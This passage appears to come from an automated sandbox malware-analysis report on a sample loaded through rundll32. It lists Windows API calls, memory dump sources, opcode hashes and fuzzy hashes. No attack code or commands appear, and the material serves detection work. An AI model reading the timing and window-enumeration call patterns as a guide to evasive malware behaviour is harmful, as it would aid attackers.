                              • GetLastError.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 049496DB
                              • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,04949752,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 04949706
                              Strings
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                              • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                              • API String ID: 1184211438-79381301
                              • Opcode ID: 00e6a5f42bedb7c6e26405905ce0688a5c35a326796382f5ddf9934f74d449af
                              • Instruction ID: 104bb91881e7424e7df865bc9b01228002f813bda30681c2edf2ed870159b334
                              • Opcode Fuzzy Hash: 00e6a5f42bedb7c6e26405905ce0688a5c35a326796382f5ddf9934f74d449af
                              • Instruction Fuzzy Hash: 03116DB0D00208ABEB10EFF5D844E9EB7E8EBC4328F5480B5E51497641E678BA40CB11
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04951ABC
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: ExceptionRaise
                              • String ID:
                              • API String ID: 3997070919-0
                              • Opcode ID: 1d85a214af3fe6116591c63c4c447f26241d42dbaf4214f9bbbf6bbce6e3573b
                              • Instruction ID: c49d7639ab27278d4c812c4f938fcbbeaeb285ca01017ca83856f83ba7ed1428
                              • Opcode Fuzzy Hash: 1d85a214af3fe6116591c63c4c447f26241d42dbaf4214f9bbbf6bbce6e3573b
                              • Instruction Fuzzy Hash: 38A16075E002099FDB14DFA8D585BEEB7B9FB48310F24413AE905A7294EB74BD84CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 04976E69
                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 04976E85
                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 04976EBE
                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 04976F3B
                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 04976F54
                              • VariantCopy.OLEAUT32(?), ref: 04976F89
                              Strings
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                              • String ID:
                              • API String ID: 351091851-3916222277
                              • Opcode ID: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                              • Instruction ID: 7812488b9dfd5dfcbdb66e5bc75aff967c32107ed975c7bd75f5b6d1ba629134
                              • Opcode Fuzzy Hash: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                              • Instruction Fuzzy Hash: E351E975A00A2D9BDB22DB58CC80BD9B7BCAF88314F0442E5E509E7211DA30AF848F61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • Sleep.KERNEL32(00000000,?), ref: 04945DCA
                              • Sleep.KERNEL32(0000000A,00000000,?), ref: 04945DE4
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: d8f69893b6ebfa751ea3fb8f856b94517fcc11ccc253cd29e1a6067d28f21507
                              • Instruction ID: 8296b4943b518a2de7cd5be8c73a7ba4779f0e65e5998c20554eeeed638692eb
                              • Opcode Fuzzy Hash: d8f69893b6ebfa751ea3fb8f856b94517fcc11ccc253cd29e1a6067d28f21507
                              • Instruction Fuzzy Hash: E9711571600200AFE715CFA8C988F1ABBD9EFC5734F16867AD6488B385DA74AC41C751
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetCapture.USER32 ref: 04B37752
                              • IsWindowUnicode.USER32(00000000), ref: 04B37795
                              • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 04B377B0
                              • SendMessageA.USER32(00000000,-0000BBEE,?,?), ref: 04B377CF
                              • GetWindowThreadProcessId.USER32(00000000), ref: 04B377DE
                              • GetWindowThreadProcessId.USER32(?,?), ref: 04B377EF
                              • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 04B3780F
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                              • String ID:
                              • API String ID: 1994056952-0
                              • Opcode ID: 54e30cd852c92e218a8b2dfed5b943e50f3f30d5468374f8b1022b907a1f5199
                              • Instruction ID: 53d3d64babfeb145b1de1be180299389de732142efbb7065f1a54eab8ca34c68
                              • Opcode Fuzzy Hash: 54e30cd852c92e218a8b2dfed5b943e50f3f30d5468374f8b1022b907a1f5199
                              • Instruction Fuzzy Hash: 402139B5214209AFE760EE5ACD80FAB73DCDF45215B24C8B8ED9EC3251EE11F8018765
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1dba7f2751aab72c6d9d2f9be9e276256e391b9546d5349d87349315acaa9c72
                              • Instruction ID: 1aac64808cf7f3954f3e69ff4a4161d02ef7ca533288786a0484be1b7d2cd7de
                              • Opcode Fuzzy Hash: 1dba7f2751aab72c6d9d2f9be9e276256e391b9546d5349d87349315acaa9c72
                              • Instruction Fuzzy Hash: FEC137A27102006BE7149AFCDD84F6DB38A9BC9335F59863AE304CB385EA68EC458350
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 04949DB8: GetCurrentThreadId.KERNEL32 ref: 04949DBB
                              • GetTickCount.KERNEL32 ref: 04949963
                              • GetTickCount.KERNEL32 ref: 0494997B
                              • GetCurrentThreadId.KERNEL32 ref: 049499AA
                              • GetTickCount.KERNEL32 ref: 049499D5
                              • GetTickCount.KERNEL32 ref: 04949A0C
                              • GetTickCount.KERNEL32 ref: 04949A36
                              • GetCurrentThreadId.KERNEL32 ref: 04949AA6
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: CountTick$CurrentThread
                              • String ID:
                              • API String ID: 3968769311-0
                              • Opcode ID: 96fc0d7eca11fc79be631316772fa05f1a00a4cc5e401b2f828325db333d435d
                              • Instruction ID: a0268810b3c7303e30048c1e82196040151f6592ba3c6fae46ac9c147b807968
                              • Opcode Fuzzy Hash: 96fc0d7eca11fc79be631316772fa05f1a00a4cc5e401b2f828325db333d435d
                              • Instruction Fuzzy Hash: 50418FB12083419FE721EEBCC484B2FBBD6AFC5354F158A3DD5D88B291EA74E4808752
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 04B379A4
                              • IsWindowUnicode.USER32 ref: 04B379B8
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 04B379DB
                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 04B379F1
                              • TranslateMessage.USER32 ref: 04B37A76
                              • DispatchMessageW.USER32 ref: 04B37A83
                              • DispatchMessageA.USER32 ref: 04B37A8B
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                              • String ID:
                              • API String ID: 2190272339-0
                              • Opcode ID: c99aee6d61b1ffcf7939c47e50c4986ffeed5a1c9e5bd5e5c0ebcf8f6d84fd8e
                              • Instruction ID: 1fc42b630ef9dbc0a8c0f7f1f242089acc37b46a35ad1233f3cfdba64a4de4b1
                              • Opcode Fuzzy Hash: c99aee6d61b1ffcf7939c47e50c4986ffeed5a1c9e5bd5e5c0ebcf8f6d84fd8e
                              • Instruction Fuzzy Hash: 56212BE434830676FB31AA6B1C00B7EB7858FD370BF24C9E9E88597191CE96B9174212
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,04B908A8,00000000,?,0494AA6A,?,?,04B9CB9C,04B9CB9C,?,?,04B91C38,04951A03,04B908A8), ref: 0494A9E5
                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,04B908A8,00000000,?,0494AA6A,?,?,04B9CB9C,04B9CB9C,?,?,04B91C38,04951A03), ref: 0494A9EB
                              • GetStdHandle.KERNEL32(000000F5,00000000,00000002,04B908A8,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,04B908A8,00000000,?,0494AA6A,?,?,04B9CB9C), ref: 0494AA06
                              • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,04B908A8,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,04B908A8,00000000,?,0494AA6A,?,?), ref: 0494AA0C
                              Strings
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: FileHandleWrite
                              • String ID: Error$Runtime error at 00000000
                              • API String ID: 3320372497-2970929446
                              • Opcode ID: 218bc63c76fc4a13508dffd5c6b76ff5c63eb809d2a1d048e356f09982da9dc3
                              • Instruction ID: 4e8824219fdd817f88783b4778bbd29886404152e9b046d0ebdff1b6450a98d3
                              • Opcode Fuzzy Hash: 218bc63c76fc4a13508dffd5c6b76ff5c63eb809d2a1d048e356f09982da9dc3
                              • Instruction Fuzzy Hash: 34F0FC616C83817BFA20A7E8CD06F59239CD7CAF28F500136F254560C4CAA4BCC45731
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 0494629A
                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 049462A0
                              • GetStdHandle.KERNEL32(000000F4,049453E8,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 049462BF
                              • WriteFile.KERNEL32(00000000,000000F4,049453E8,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 049462C5
                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,049453E8,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 049462DC
                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,049453E8,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 049462E2
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: FileHandleWrite
                              • String ID:
                              • API String ID: 3320372497-0
                              • Opcode ID: 09f5ba0824fb56debda24352af4ea531c2581240eeb58096566e06b2898b047f
                              • Instruction ID: df0216744c5a28d7c4b082b012acd462f806b12b3f6ac0f6059c73492ea04f35
                              • Opcode Fuzzy Hash: 09f5ba0824fb56debda24352af4ea531c2581240eeb58096566e06b2898b047f
                              • Instruction Fuzzy Hash: 42013CA52542247FF620B6F8DC84F6F2A8CDBDA678F510636B218D70D6C964BC0492B2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • Sleep.KERNEL32(00000000), ref: 04945A67
                              • Sleep.KERNEL32(0000000A,00000000), ref: 04945A7D
                              • Sleep.KERNEL32(00000000), ref: 04945AAB
                              • Sleep.KERNEL32(0000000A,00000000), ref: 04945AC1
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 22ff56cdf40cca4962bd5029c0841b16567cdbfd6c5d15e7f18b2e59f16198aa
                              • Instruction ID: d4de50f71209a288570e43d14e5047432b9dfe5d207e9ca70d2cfb5fa18e44ad
                              • Opcode Fuzzy Hash: 22ff56cdf40cca4962bd5029c0841b16567cdbfd6c5d15e7f18b2e59f16198aa
                              • Instruction Fuzzy Hash: 4AC13772601291AFD719CFA8D680B15BBE5FBC9320F1A817ED6058B384DBB4BC41C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • EnumWindows.USER32(04B364D4,00000000), ref: 04B3661E
                              • ShowWindow.USER32(?,00000000,04B364D4,00000000), ref: 04B36660
                              • ShowOwnedPopups.USER32(00000000,?), ref: 04B3668F
                              • ShowWindow.USER32(?,00000005), ref: 04B36704
                              • ShowOwnedPopups.USER32(00000000,?), ref: 04B36733
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
